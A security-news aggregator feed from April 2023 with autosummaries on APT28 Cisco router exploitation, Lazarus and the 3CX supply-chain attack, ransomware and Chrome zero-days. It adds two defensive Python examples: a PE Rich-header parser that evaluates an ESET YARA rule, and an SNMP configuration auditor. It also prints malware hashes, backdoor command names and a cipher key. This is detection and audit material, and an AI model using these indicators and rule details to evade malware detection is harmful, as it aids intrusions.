                Google: Ukraine targeted by 60% of Russian phishing attacks in 2023

                financial rusia-ucrania
                2023-04-20 https://www.bleepingcomputer.com/news/security/google-ukraine-targeted-by-60-percent-of-russian-phishing-attacks-in-2023/
                Google's Threat Analysis Group (TAG) has been monitoring and disrupting Russian state-backed cyberattacks targeting Ukraine's critical infrastructure in 2023. [...] "

                Autosummary: Phishing page where victims land after an XSS redirection (Google) This week, a joint announcement by the UK NCSC, FBI, NSA, and CISA warned that APT28 is hacking Cisco Routers to install custom malware. "


                Lazarus APT group employed Linux Malware in recent attacks and was linked to 3CX supply chain attack

                exploits
                2023-04-20 https://securityaffairs.com/145073/apt/lazarus-apt-linux-malware-3cx-attack.html

                North Korea-linked APT group Lazarus employed new Linux malware in attacks that are part of Operation Dream Job. North Korea-linked APT group Lazarus is behind a new campaign tracked as Operation DreamJob (aka DeathNote or NukeSped) that employed Linux malware. The threat actors were observed using social engineering techniques to compromise its targets, with fake job offers […]

                The post Lazarus APT group employed Linux Malware in recent attacks and was linked to 3CX supply chain attack appeared first on Security Affairs.

                "

                Autosummary: "


                FTC tackles tech support scams by chasing payment processor firms

                financial
                2023-04-20 https://www.malwarebytes.com/blog/news/2023/04/ftc-tackles-tech-support-scams-by-chasing-payment-processor-firms

                Categories: News

                Tags: ftc

                Tags: tech support scam

                Tags: scammers

                Tags: payment processor

                Tags: fine

                Tags: visa

                Tags: chargeback

                We take a look at a story involving the FTC going head to head with a payment processor caught up in tech support scam allegations.


                The post FTC tackles tech support scams by chasing payment processor firms appeared first on Malwarebytes Labs.

                "

                Autosummary: The February 10, 2017 email included a table showing Tech Live Connect had (1) chargeback rates of 2.2% in November 2016, 2.6% in December 2016, and 1.5% in January 2017; and (2) cancelation rates of 23.2% in November 2016, 27% in December 2016, and 21.8% in January 2017. From the FTC release: The Federal Trade Commission has acted to stop Nexway, a multinational payment processing company, along with its CEO and chief strategy officer, from serving as a facilitator for the tech support scammers through credit card laundering. For a very detailed breakdown of tech support scams, how they operate, and more suggestions to keep yourself safe from harm, please check out our dedicated tech support scams page. "


                Fancy Bear known to be exploiting vulnerability in Cisco routers

                exploits
                2023-04-20 https://www.malwarebytes.com/blog/news/2023/04/fancy-bear-known-to-be-exploiting-vulnerability-in-cisco-routers

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: APT28

                Tags: Sofacy

                Tags: Fancy Bear

                Tags: GRU

                Tags: Cisco

Tags: CVE-2017-6742

                Tags: SNMP

                Tags: Jaguar Tooth

A joint advisory about a Cisco vulnerability by several US and UK agencies gives us a peek inside the minds of ideologically motivated cybercriminals.


                The post Fancy Bear known to be exploiting vulnerability in Cisco routers appeared first on Malwarebytes Labs.

                "

Autosummary: In a joint advisory, the UK National Cyber Security Centre (NCSC), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have released information about APT28’s exploitation of Cisco routers in 2021. SNMP is designed to allow network administrators to monitor and configure network devices remotely, but it can also be abused to obtain sensitive network information and, if vulnerable, exploit devices to penetrate a network. "


                Multinational ICICI Bank leaks passports and credit card numbers

                financial
                2023-04-20 https://securityaffairs.com/145094/uncategorized/icici-bank-data-leak.html

                ICICI Bank leaked millions of records with sensitive data, including financial information and personal documents of the bank’s clients. In 2022, the ICICI Bank’s resources were named a “critical information infrastructure” by the Indian government – any harm to it can impact national security. However, despite the critical status of bank infrastructure on the national […]

                The post Multinational ICICI Bank leaks passports and credit card numbers appeared first on Security Affairs.

                "

Autosummary: Among the leaked data were bank account details, bank statements, credit card numbers, full names, dates of birth, home addresses, phone numbers, emails, personal identification documents, and employees’ and candidates’ CVs. "


                Linux malware strengthens links between Lazarus and the 3CX supply‑chain attack

                exploits
                2023-04-20 https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack/

                Similarities with newly discovered Linux malware used in Operation DreamJob corroborate the theory that the infamous North Korea-aligned group is behind the 3CX supply-chain attack

                The post Linux malware strengthens links between Lazarus and the 3CX supply‑chain attack appeared first on WeLiveSecurity

                "

Autosummary: Initially reported on March 29th, 2023 in a Reddit thread by a CrowdStrike engineer, followed by an official report by CrowdStrike, stating with high confidence that LABYRINTH CHOLLIMA, the company’s codename for Lazarus, was behind the attack (but omitting any evidence backing up the claim). Because of the seriousness of the incident, multiple security companies started to contribute their summaries of the events, namely Sophos, Check Point, Broadcom, Trend Micro, and more. On April 3rd, Kaspersky, through its telemetry, showed a direct relationship between the 3CX supply-chain victims and the deployment of a backdoor dubbed Gopuram, both involving payloads with a common name, guard64.dll. No hashes were provided, but Mandiant’s YARA rule, named TAXHAUL, also triggers on other samples already on VirusTotal: SHA-1: 2ACC6F1D4656978F4D503929B8C804530D7E7CF6 (ualapi.dll), SHA-1: DCEF83D8EE080B54DC54759C59F955E73D67AA65 (wlbsctrl.dll). The filenames, but not MD5s, of these samples coincide with those from Kaspersky’s blogpost.

ESET’s Rich Headers-based YARA rule, as far as it survives on this page (the start of the description string and the end of the condition are cut off):

    ...Rich Headers-based rule covering the IconicLoader and IconicStealer from the 3CX supply chain incident, and also payloads from the cryptocurrency campaigns from 2022-12"
    author = "ESET Research"
    date = "2023-03-31"
    hash = "3B88CDA62CDD918B62EF5AA8C5A73A46F176D18B"
    hash = "CAD1120D91B812ACAFEF7175F949DD1B09C6C21A"
    hash = "5B03294B72C0CAA5FB20E7817002C600645EB475"
    hash = "7491BD61ED15298CE5EE5FFD01C8C82A2CDB40EC"
    condition:
        pe.rich_signature.toolid(259, 30818) == 9 and
        pe.rich_signature.toolid(256, 31329) == 1 and
        pe.rich_signature.toolid(261, 30818) >= 30 and
        pe.rich_signature.toolid(261, 30818) <= 38 and
        pe.rich_signature.toolid(261, 29395) >=

How is sysnetd related to Lazarus? Comparison of the original symbol names from two Linux backdoors submitted to VirusTotal, guiconfigd (SimplexTea for Linux, from Georgia) and sysnetd (BADCALL for Linux, from Romania):

    guiconfigd (SimplexTea for Linux):
        CMsgCmd::Start(void)
        CMsgSecureDel::Start(void)
        CMsgDir::Start(void)
        CMsgDown::Start(void)
        CMsgExit::Start(void)
        CMsgReadConfig::Start(void)
        CMsgRun::Start(void)
        CMsgSetPath::Start(void)
        CMsgSleep::Start(void)
        CMsgTest::Start(void)
        CMsgUp::Start(void)
        CMsgWriteConfig::Start(void)
        CMsgHibernate::Start(void)
        CMsgKeepCon::Start(void)
        CMsgZipDown::Start(void)
        CMsgZip::StartZip(void *)
        CMsgZip::Start(void)
        CHttpWrapper::RecvData(uchar *&,uint *,uint,signed char)
        CHttpWrapper::SendMsg(_MSG_STRUCT *)
        CHttpWrapper::SendData(uchar *,uint,uint)
        CHttpWrapper::SendMsg(uint,uint,uchar *,uint,uint)
        CHttpWrapper::SendLoginData(uchar *,uint,uchar *&,uint *)

    sysnetd (BADCALL for Linux):
        MSG_Cmd
        MSG_Del
        MSG_Dir
        MSG_Down
        MSG_Exit
        MSG_ReadConfig
        MSG_Run
        MSG_SetPath
        MSG_Sleep
        MSG_Test
        MSG_Up
        MSG_WriteConfig
        MSG_GetComInfo
        RecvMsg
        SendMsg

Taking a look at the three 32-bit integers, 0xC2B45678, 0x90ABCDEF, and 0xFE268455 from Figure 5, which represent a key for a custom implementation of the A5/1 cipher, we realized that the same algorithm and the identical keys were used in Windows malware that dates back to the end of 2014 and was involved in one of the most notorious Lazarus cases: the cybersabotage of Sony Pictures Entertainment (SHA-1: 1C66E67A8531E3FF1C64AE57E6EDFDE7BEF2352D). "
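The ESET rule quoted in the entry above matches on the PE Rich header rather than on strings or code: in YARA, pe.rich_signature.toolid(id, build) returns how many Rich entries carry that product id and build number, which is what makes the rule survive repacking of the payload as long as the same toolchain built it. The following Python is an added example, not ESET’s code and not from the 3CX investigation: it builds a synthetic Rich header from constructed (product id, build, count) triples, decodes it the way a PE parser does (locate "Rich", take the XOR key that follows it, walk back to "DanS"), and evaluates the clauses of the rule that survive on this page. The toolid(261, 29395) clause is truncated on the page and is left out; the sample entry values, the MZ stub and the key are invented for the example.

```python
import struct

DANS = 0x536E6144  # "DanS" marker that opens the Rich header
RICH = 0x68636952  # "Rich" marker that closes it; the XOR key follows it in clear


def build_rich_header(entries, key):
    """Build a synthetic Rich header from (prodid, build, count) triples.

    Layout (little-endian dwords, everything before "Rich" XORed with key):
    DanS, three zero padding dwords, (compid, count) pairs, "Rich", key.
    compid packs the product id in the high 16 bits and the build in the low 16.
    """
    words = [DANS ^ key, key, key, key]          # 0 ^ key == key for the padding
    for prodid, build, count in entries:
        compid = (prodid << 16) | (build & 0xFFFF)
        words.extend([compid ^ key, count ^ key])
    words.extend([RICH, key])
    return struct.pack("<%dI" % len(words), *words)


def parse_rich_header(blob):
    """Decode the Rich header in blob; return a list of (prodid, build, count).

    Finds the dword-aligned "Rich" marker, reads the key after it, then walks
    back one dword at a time until a word XORs to DanS, as PE tooling does.
    """
    rich = blob.find(b"Rich")
    while rich != -1 and rich % 4:               # marker must be dword aligned
        rich = blob.find(b"Rich", rich + 1)
    if rich == -1:
        raise ValueError("no Rich marker")
    key = struct.unpack_from("<I", blob, rich + 4)[0]
    pos = rich - 4
    while pos >= 0 and struct.unpack_from("<I", blob, pos)[0] ^ key != DANS:
        pos -= 4
    if pos < 0:
        raise ValueError("no DanS marker")
    entries = []
    for off in range(pos + 16, rich, 8):         # skip DanS and 3 padding dwords
        compid, count = (w ^ key for w in struct.unpack_from("<II", blob, off))
        entries.append((compid >> 16, compid & 0xFFFF, count))
    return entries


def toolid(entries, prodid, build=None):
    """Mirror YARA's pe.rich_signature.toolid(prodid[, build]): summed count."""
    return sum(c for p, b, c in entries
               if p == prodid and (build is None or b == build))


def matches_eset_fragment(entries):
    """The Rich header clauses of ESET's rule as preserved on this page
    (the truncated toolid(261, 29395) clause is omitted)."""
    return (toolid(entries, 259, 30818) == 9
            and toolid(entries, 256, 31329) == 1
            and 30 <= toolid(entries, 261, 30818) <= 38)


# Constructed samples: a fake MZ stub followed by a synthetic Rich header.
# The entry values are chosen to exercise the rule; they are not from real files.
STUB = b"MZ" + b"\x00" * 0x7E
KEY = 0x8A1B2C3D
SAMPLE_MATCH = STUB + build_rich_header(
    [(259, 30818, 9), (256, 31329, 1), (261, 30818, 34), (261, 29395, 40)], KEY)
SAMPLE_NOMATCH = STUB + build_rich_header(
    [(259, 30818, 9), (256, 31329, 1), (261, 30818, 12)], KEY)

if __name__ == "__main__":
    for name, blob in (("match", SAMPLE_MATCH), ("nomatch", SAMPLE_NOMATCH)):
        ents = parse_rich_header(blob)
        print(name, ents, matches_eset_fragment(ents))
```

Run against a real PE, the same parser works on the bytes between the DOS header and e_lfanew; the point to keep in mind when writing such rules is that the Rich header is unauthenticated metadata written by the linker, so a builder who strips or rewrites it evades the rule, which is why ESET pairs it with the listed hashes rather than relying on it alone.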


                5 free online cybersecurity resources for small businesses

                ciber
                2023-04-19 https://www.helpnetsecurity.com/2023/04/19/small-business-free-cybersecurity/

                As cyberattacks increase in frequency and sophistication, small and medium-sized businesses (SMBs) become more vulnerable to cyber threats. Unlike larger enterprises, SMBs often lack the financial and technical resources to secure their networks and data against malicious actors effectively. With limited budgets and IT staff, many small companies are forced to make difficult decisions about where to allocate their resources. Fortunately, several free online cybersecurity resources can help small businesses protect themselves from cyber attacks. … More

                The post 5 free online cybersecurity resources for small businesses appeared first on Help Net Security.

                "

                Autosummary: Cyber Readiness Program The Cyber Readiness Program is a free resource that helps small and medium-sized enterprises become cyber-ready, improving their resilience to cyber threats. "


                Ransomware reinfection and its impact on businesses

                exploits
                2023-04-19 https://www.helpnetsecurity.com/2023/04/19/ransomware-reinfection-business-impact-video/

                Destructive ransomware attacks impact enterprises, governments, airlines, hospitals, hotels, and individuals, causing widespread system downtime, economic loss, and reputational damage. In this Help Net Security video, AnnMarie Nayiga, Lead MDR Analyst at Malwarebytes, talks about the dangers of ransomware reinfection.

                The post Ransomware reinfection and its impact on businesses appeared first on Help Net Security.

                "

                Autosummary: "


                Tight budgets and burnout push enterprises to outsource cybersecurity

                ciber
                2023-04-19 https://www.helpnetsecurity.com/2023/04/19/cybersecurity-professionals-responsibilities/

                With cybersecurity teams struggling to manage the remediation process and monitor for vulnerabilities, organizations are at a higher risk for security breaches, according to Cobalt. As enterprises prioritize efficiencies, security leaders increasingly turn to third-party vendors to alleviate the pressures of consistent testing and to fill in talent gaps. The report identifies how macroeconomic shifts are affecting organizations’ security standards across the U.S. and EMEA, revealing how security teams can extract more value from their … More

                The post Tight budgets and burnout push enterprises to outsource cybersecurity appeared first on Help Net Security.

                "

                Autosummary: Other vulnerabilities spanned across Cross-Site Scripting (12%), Sensitive Data Exposure (10%), Broken Access Control (10%) and Authentication & Sessions (9%). "


                Phylum adds OPA and continuous reporting to its policy engine

                ransomware
                2023-04-19 https://www.helpnetsecurity.com/2023/04/19/phylum-policy-engine/

                Phylum has added Open Policy Agent (OPA) and continuous reporting to its policy engine. Customers now have more flexibility when creating and enforcing custom policies, and can show compliance with key software supply chain frameworks, regulations and guidelines. “We built Phylum’s policy engine as a security-as-code mechanism to give security and risk teams more visibility into the development lifecycle and allow them to enforce security policy without disruption. Phylum is the only platform that allows … More

                The post Phylum adds OPA and continuous reporting to its policy engine appeared first on Help Net Security.

                "

                Autosummary: "


                Iranian Government-Backed Hackers Targeting U.S. Energy and Transit Systems

                government industry
                2023-04-19 https://thehackernews.com/2023/04/iranian-government-backed-hackers.html
An Iranian government-backed actor known as Mint Sandstorm has been linked to attacks aimed at critical infrastructure in the U.S. between late 2021 and mid-2022. "This Mint Sandstorm subgroup is technically and operationally mature, capable of developing bespoke tooling and quickly weaponizing N-day vulnerabilities, and has demonstrated agility in its operational focus, which appears to align "

                Autosummary: Drokbk was previously detailed by Secureworks Counter Threat Unit (CTU) in December 2022, attributing it to a threat actor known as Nemesis Kitten (aka Cobalt Mirage, TunnelVision, or UNC2448), a sub-cluster of Mint Sandstorm. "


                PWNYOURHOME, FINDMYPWN, LATENTIMAGE: 3 iOS Zero-Click exploits used by NSO Group in 2022

                exploits
                2023-04-19 https://securityaffairs.com/144981/hacking/nso-group-zero-click-exploits-2022.html

                Citizen Lab reported that Israeli surveillance firm NSO Group used at least three iOS zero-click exploits in 2022. A new report from Citizen Lab states that the Israeli surveillance firm NSO Group used at least three zero-click zero-day exploits to deliver its Pegasus spyware. In 2022, the Citizen Lab analyzed the NSO Group activity after finding […]

                The post PWNYOURHOME, FINDMYPWN, LATENTIMAGE: 3 iOS Zero-Click exploits used by NSO Group in 2022 appeared first on Security Affairs.

                "

Autosummary: The victims include journalists, political opposition figures, and an NGO worker located in North America, Central Asia, Southeast Asia, Europe, and the Middle East. "


                Google patches another actively exploited Chrome zero-day

                exploits
                2023-04-19 https://www.bleepingcomputer.com/news/security/google-patches-another-actively-exploited-chrome-zero-day/
                Google has released a security update for the Chrome web browser to fix the second zero-day vulnerability found to be exploited in attacks this year. [...] "

Autosummary: "We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed" - Google. Last Friday, Google released another emergency Chrome update to fix CVE-2023-2033, the first actively exploited vulnerability in the browser discovered in 2023. "


                Play ransomware gang uses custom Shadow Volume Copy data-theft tool

                exploits ransomware
                2023-04-19 https://www.bleepingcomputer.com/news/security/play-ransomware-gang-uses-custom-shadow-volume-copy-data-theft-tool/
                The Play ransomware group has developed two custom tools in .NET, namely Grixba and VSS Copying Tool, which it uses to improve the effectiveness of its cyberattacks. [...] "

                Autosummary: "


                March 2023 broke ransomware attack records with 459 incidents

                exploits ransomware
                2023-04-19 https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/
                March 2023 was the most prolific month recorded by cybersecurity analysts in recent years, measuring 459 attacks, an increase of 91% from the previous month and 62% compared to March 2022. [...] "

                Autosummary: Most targeted sectors by ransomware actors (NCC Group) In second place are "Consumer Cyclicals," encompassing construction supplies, specialty retailers, hotels, automobiles, media & publishing, household goods, etc. "


                Pakistani Hackers Use Linux Malware Poseidon to Target Indian Government Agencies

                exploits government
                2023-04-19 https://thehackernews.com/2023/04/pakistani-hackers-use-linux-malware.html
The Pakistan-based advanced persistent threat (APT) actor known as Transparent Tribe used a two-factor authentication (2FA) tool deployed by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon. "Poseidon is a second-stage payload malware associated with Transparent Tribe," Uptycs security researcher Tejaswini Sandapolla said in a technical report published this week. "

                Autosummary: " Transparent Tribe is also tracked as APT36, Operation C-Major, PROJECTM, and Mythic Leopard, and has a track record of targeting Indian government organizations, military personnel, defense contractors, and educational entities. "


                U.S. and U.K. Warn of Russian Hackers Exploiting Cisco Router Flaws for Espionage

                exploits rusia-ucrania
                2023-04-19 https://thehackernews.com/2023/04/us-and-uk-warn-of-russian-hackers.html
                U.K. and U.S. cybersecurity and intelligence agencies have warned of Russian nation-state actors exploiting now-patched flaws in networking equipment from Cisco to conduct reconnaissance and deploy malware against targets. The intrusions, per the authorities, took place in 2021 and targeted a small number of entities in Europe, U.S. government institutions, and about 250 Ukrainian victims. The "

                Autosummary: The activity has been attributed to a threat actor tracked as APT28, which is also known as Fancy Bear, Forest Blizzard (formerly Strontium), FROZENLAKE, and Sofacy, and is affiliated with the Russian General Staff Main Intelligence Directorate (GRU). "


UK cyber-agency warns of a new ‘class’ of Russian hackers

                rusia-ucrania
                2023-04-19 https://www.bleepingcomputer.com/news/security/uk-cyber-argency-warns-of-a-new-class-of-russian-hackers/
The United Kingdom's NCSC (National Cyber Security Centre) is warning of a heightened risk from attacks by state-aligned Russian hacktivists, urging all organizations in the country to apply recommended security measures. [...] "

                Autosummary: Larger organizations should consider taking additional, advanced actions like accelerating security improvements, reassessing risk tolerance, temporarily reducing system functionality, aggressively patching vulnerabilities, delaying non-security system changes, and preparing for extended operational hours or incident response scaling. "


                Hackers actively exploit critical RCE bug in PaperCut servers

                exploits
                2023-04-19 https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/
                Print management software developer PaperCut is warning customers to update their software immediately, as hackers are actively exploiting flaws to gain access to vulnerable servers. [...] "

                Autosummary: "As of 18th April, 2023 we have evidence to suggest that unpatched servers are being exploited in the wild, (particularly ZDI-CAN-18987 / PO-1216)," reads the advisory. "


                Google TAG Warns of Russian Hackers Conducting Phishing Attacks in Ukraine

                financial rusia-ucrania
                2023-04-19 https://thehackernews.com/2023/04/google-tag-warns-of-russian-hackers.html
Elite hackers associated with Russia's military intelligence service have been linked to large-volume phishing campaigns aimed at hundreds of users in Ukraine to extract intelligence and influence public discourse related to the war. Google's Threat Analysis Group (TAG), which is monitoring the activities of the actor under the name FROZENLAKE, said the attacks continue the "group's 2022 focus "

                Autosummary: " The state-sponsored cyber actor, also tracked as APT28, Fancy Bear, Forest Blizzard, Iron Twilight, Sednit, and Sofacy, is both highly active and proficient. "


                Google Chrome Hit by Second Zero-Day Attack - Urgent Patch Update Released

                exploits
                2023-04-19 https://thehackernews.com/2023/04/google-chrome-hit-by-second-zero-day.html
Google on Tuesday rolled out emergency fixes to address another actively exploited high-severity zero-day flaw in its Chrome web browser. The flaw, tracked as CVE-2023-2136, is described as a case of integer overflow in Skia, an open source 2D graphics library. Clément Lecigne of Google's Threat Analysis Group (TAG) has been credited with discovering and reporting the flaw on April 12, 2023. "

                Autosummary: "


                US and UK agencies warn of Russia-linked APT28 exploiting Cisco router flaws

                exploits
                2023-04-19 https://securityaffairs.com/145007/apt/apt28-targets-cisco-networking-equipment.html

UK and US agencies are warning of the Russia-linked APT28 group exploiting vulnerabilities in Cisco networking equipment. Russia-linked APT28 accesses unpatched Cisco routers and deploys malware by exploiting the CVE-2017-6742 vulnerability (CVSS score: 8.8), states a joint report published by the UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure […]

                The post US and UK agencies warn of Russia-linked APT28 exploiting Cisco router flaws appeared first on Security Affairs.

                "

Autosummary: "
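The four entries on this advisory (the Malwarebytes, The Hacker News and Security Affairs items above) share one operational point: SNMP on an edge router is a reconnaissance source for anyone who can guess a community string, and on an unpatched IOS it is also the path to code execution. The Python below is an added example, not part of the advisory, of Cisco’s documentation or of any of the articles: it audits a constructed IOS running-config excerpt for the SNMP exposure conditions a reviewer would check first (well-known community names, read-write communities, communities not bound to an access-list, SNMPv3 groups without authentication). The config text, the WELL_KNOWN list and the severities are my own choices; the command syntax is standard IOS.

```python
import re

# Constructed Cisco IOS running-config excerpt. It is sample input for this
# example, not a configuration from the advisory or from any real device.
SAMPLE_CONFIG = """\
hostname edge-rtr-1
!
access-list 10 permit 10.20.30.5
!
snmp-server community public RO
snmp-server community s3cr3t-rw RW
snmp-server community netmon RO 10
snmp-server group OPS v3 priv
snmp-server group LEGACY v3 noauth
snmp-server user nms OPS v3 auth sha AuthPassw0rd priv aes 128 PrivPassw0rd
snmp-server host 10.20.30.5 version 3 priv nms
"""

# Community strings that every scanner, and every attacker, tries first.
WELL_KNOWN = {"public", "private", "cisco", "community", "admin"}


def parse_community(line):
    """Parse 'snmp-server community <name> [view <v>] [RO|RW] [<acl>]'.

    Returns {"community", "mode", "acl"} or None for other lines. IOS treats a
    missing RO/RW keyword as read-only, and a trailing bare token as the
    access-list that limits which source addresses may use the community.
    """
    m = re.match(r"^snmp-server community (\S+)(.*)$", line.strip())
    if not m:
        return None
    name, tokens = m.group(1), m.group(2).split()
    mode, acl = "RO", None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.lower() == "view":        # 'view <name>' takes one argument
            i += 2
            continue
        if tok.upper() in ("RO", "RW"):
            mode = tok.upper()
        else:
            acl = tok
        i += 1
    return {"community": name, "mode": mode, "acl": acl}


def audit_snmp(config):
    """Return (severity, subject, message) findings for an IOS config text."""
    findings = []
    for line in config.splitlines():
        c = parse_community(line)
        if c:
            name = c["community"]
            if name.lower() in WELL_KNOWN:
                findings.append(("HIGH", name, "well-known community string"))
            if c["mode"] == "RW":
                findings.append(("HIGH", name, "read-write community allows configuration changes"))
            if c["acl"] is None:
                findings.append(("MEDIUM", name, "community not restricted by an access-list"))
            findings.append(("INFO", name, "SNMPv1/v2c community: unauthenticated and cleartext on the wire"))
            continue
        g = re.match(r"^snmp-server group (\S+) v3 (noauth|auth|priv)\b", line.strip())
        if g and g.group(2) == "noauth":
            findings.append(("MEDIUM", g.group(1), "SNMPv3 group without authentication"))
    return findings


def summarize(findings):
    """Count findings per severity."""
    counts = {}
    for severity, _, _ in findings:
        counts[severity] = counts.get(severity, 0) + 1
    return counts


if __name__ == "__main__":
    for sev, subject, msg in audit_snmp(SAMPLE_CONFIG):
        print(f"{sev:6} {subject:12} {msg}")
    print(summarize(audit_snmp(SAMPLE_CONFIG)))
```

Removing the v1/v2c communities in favour of the SNMPv3 priv group and binding any community that must stay to an access-list clears the findings; these checks cover exposure only, and a router that still runs a vulnerable IOS build needs the vendor fix regardless of how SNMP access is scoped.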


                Microsoft SQL servers hacked to deploy Trigona ransomware

                exploits ransomware
                2023-04-19 https://www.bleepingcomputer.com/news/security/microsoft-sql-servers-hacked-to-deploy-trigona-ransomware/
Attackers are hacking into poorly secured and Internet-exposed Microsoft SQL (MS-SQL) servers to deploy Trigona ransomware payloads and encrypt all files. [...] "

                Autosummary: "


                Fortra shares findings on GoAnywhere MFT zero-day attacks

                exploits
                2023-04-19 https://www.bleepingcomputer.com/news/security/fortra-shares-findings-on-goanywhere-mft-zero-day-attacks/
                Fortra has completed its investigation into the exploitation of CVE-2023-0669, a zero-day flaw in the GoAnywhere MFT solution that the Clop ransomware gang exploited to steal data from over a hundred companies. [...] "

                Autosummary: “During the investigation, we discovered the unauthorized party used CVE-2023-0669 to install up to two additional tools - “Netcat” and “Errors.jsp” - in some MFTaaS customer environments between January 28, 2023, and January 31, 2023,” explains Fortra. "


                Ransomware gangs abuse Process Explorer driver to kill security software

                exploits
                2023-04-19 https://www.bleepingcomputer.com/news/security/ransomware-gangs-abuse-process-explorer-driver-to-kill-security-software/
Threat actors use a new hacking tool dubbed AuKill to disable Endpoint Detection & Response (EDR) software on targets' systems before deploying backdoors and ransomware in Bring Your Own Vulnerable Driver (BYOVD) attacks. [...] "

                Autosummary: " AuKill timeline (Sophos X-Ops) ​AuKill is similar to an open-source tool called Backstab, which also uses a Process Explorer driver to disable security solutions running on compromised devices. "


                Russian national sentenced to time served for committing money laundering for the Ryuk ransomware operation

                financial exploits ransomware rusia-ucrania
                2023-04-19 https://securityaffairs.com/145029/cyber-crime/russian-national-sentenced-money-laundering-ryuk-ransomware.html

Russian national Denis Mihaqlovic Dubnikov has been sentenced to time served for committing money laundering for the Ryuk ransomware operation. Russian national Denis Dubnikov (30) has been sentenced to time served for committing money laundering for the Ryuk ransomware group. The man was also ordered to pay $2,000 in restitution. On February 7, 2023, Dubnikov pleaded […]

                The post Russian national sentenced to time served for committing money laundering for the Ryuk ransomware operation appeared first on Security Affairs.

                "

Autosummary: "


                Google fixed the second actively exploited Chrome zero-day of 2023

                exploits
                2023-04-19 https://securityaffairs.com/145019/security/google-second-chrome-zero-day-2023.html

                Google rolled out emergency security patches to address another actively exploited high-severity zero-day flaw in the Chrome browser. Google rolled out emergency fixes to address another actively exploited high-severity zero-day flaw, tracked as CVE-2023-2136, in its Chrome web browser. The vulnerability is an Integer overflow in the Skia graphics library, the issue was reported by […]

                The post Google fixed the second actively exploited Chrome zero-day of 2023 appeared first on Security Affairs.

                "

Autosummary: "


                Introducing the Malwarebytes Admin app: Endpoint security at your fingertips

                exploits
                2023-04-19 https://www.malwarebytes.com/blog/business/2023/04/introducing-the-malwarebytes-admin-app-endpoint-security-at-your-fingertips

                Categories: Business

                IT security on the go.


                The post Introducing the Malwarebytes Admin app: Endpoint security at your fingertips appeared first on Malwarebytes Labs.

                "

                Autosummary: You can assign roles (Super Admin, Admin, Read-only), add users to existing groups, delete users, resend invites, and edit user roles or group membership. Selecting the "Actions" button lets you take various actions on the chosen endpoints, such as scanning, isolating, updating agents, checking for updates, and remediating endpoints. "


                Malware authors join forces and target organisations with Domino Backdoor

                exploits
                2023-04-19 https://www.malwarebytes.com/blog/news/2023/04/malware-authors-join-forces-and-target-organisations-with-domino-backdoor

                Categories: News

                Tags: domino

                Tags: loader

                Tags: backdoor

                Tags: malware

                Tags: ransomware

                Tags: emotet

                Tags: network

                Tags: corporate

                Tags: business

                Tags: organisation

                Tags: data

                Tags: theft

                Tags: steal

                Tags: banking

                Tags: trojan

                We take a look at a malware collective pushing a set of Domino malware files.


                The post Malware authors join forces and target organisations with Domino Backdoor appeared first on Malwarebytes Labs.

                "

                Autosummary: Grabbing links from the desktop Collection of system information in HTML format Telegram sessions Collection of Discord tokens It can also be set to block startup inside of a virtual machine (often used to test malware files), lock the startup if found to be running in a CIS country, and self-delete after sending the stolen data. "


                Instagram scam promises money in exchange for your image

                financial
                2023-04-19 https://www.malwarebytes.com/blog/news/2023/04/instagram-scam-promises-money-in-exchange-for-your-image

                Categories: News

                Tags: fake

                Tags: muse

                Tags: art

                Tags: artist

                Tags: instagram

                Tags: check

                Tags: payment

                Tags: fraud

                Tags: wire

                Tags: bank

                Tags: banking

                Tags: drawing

                Tags: painting

                We take a look at a fake check scam which plugs into the art world.


                The post Instagram scam promises money in exchange for your image appeared first on Malwarebytes Labs.

                "

Autosummary: From another recent Reddit example: "Someone said that they'll want some muse for an art thing, and so she sent me a check of $2500 to pay me $500 with the remaining $2000 sent to her." "Luckily" for this person, the payment amount in this example ($100 for art supplies) is not typical for this scam, and significantly lower than usual. After a few weeks, with the scammer long gone, the check will eventually bounce and you’ll absorb the cost of the remaining check money from your own finances. "


                Smashing Security podcast #318: Tesla workers spy on drivers, and Operation Fox Hunt scams

                financial
                2023-04-19 https://grahamcluley.com/smashing-security-podcast-318/
Graham wonders what would happen if his bouncing buttocks were captured on camera by a Tesla employee, and we take a look at canny scams connected to China's Operation Fox Hunt. All this and more is discussed in the latest edition of the "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault. "

Autosummary: Hosts: Graham Cluley – @gcluley, Carole Theriault – @caroletheriault. "


                Wargaming an effective data breach playbook

                financial
                2023-04-18 https://www.helpnetsecurity.com/2023/04/18/effective-data-breach-playbook/

                A well-tuned data breach playbook can provide security teams with a clear roadmap for working through the breach response process. Foreseeing every possible twist and turn of a breach may be impossible, but through extensive wargaming, teams can simulate diverse situations to give them a proactive edge. Building a playbook means mapping practical data breach scenarios around product security, infrastructure, corporate security, social engineering, vendor supply chain risk, and more. Security teams can approach these … More

                The post Wargaming an effective data breach playbook appeared first on Help Net Security.

                "

Autosummary: Depending on the conditions simulated, these playbooks can include:
- How to identify and attribute a data breach
- Identify the proximal systems in the blast radius
- Communicate breach status to key company stakeholders
- Include necessary teams such as DevOps, legal, marketing/PR, etc.
- Determine remediation efforts needed (e.g., breach location quarantine, patching) and assign responsible team members
- Decide when and how to notify impacted individuals and government entities
- Plan when and how to release a public statement
The completed playbooks should be distributed to all necessary stakeholders across the company to break down silos, generate buy-in, and ensure everyone is united in their approach. "


                Balancing cybersecurity with business priorities: Advice for Boards

                ciber
                2023-04-18 https://www.helpnetsecurity.com/2023/04/18/alicja-cade-google-cybersecurity-business-priorities/

                In today’s rapidly evolving technological landscape, it’s more important than ever for Boards and executives to stay informed about the latest advancements and potential risks in technology and digital capability. In this Help Net Security interview, Alicja Cade, Director, Financial Services, Office of the CISO, Google Cloud, offers insights on how asking the right questions can help improve cyber performance and readiness, advance responsible AI practices, and balance the need for cybersecurity with other business … More

The post Balancing cybersecurity with business priorities: Advice for Boards appeared first on Help Net Security.

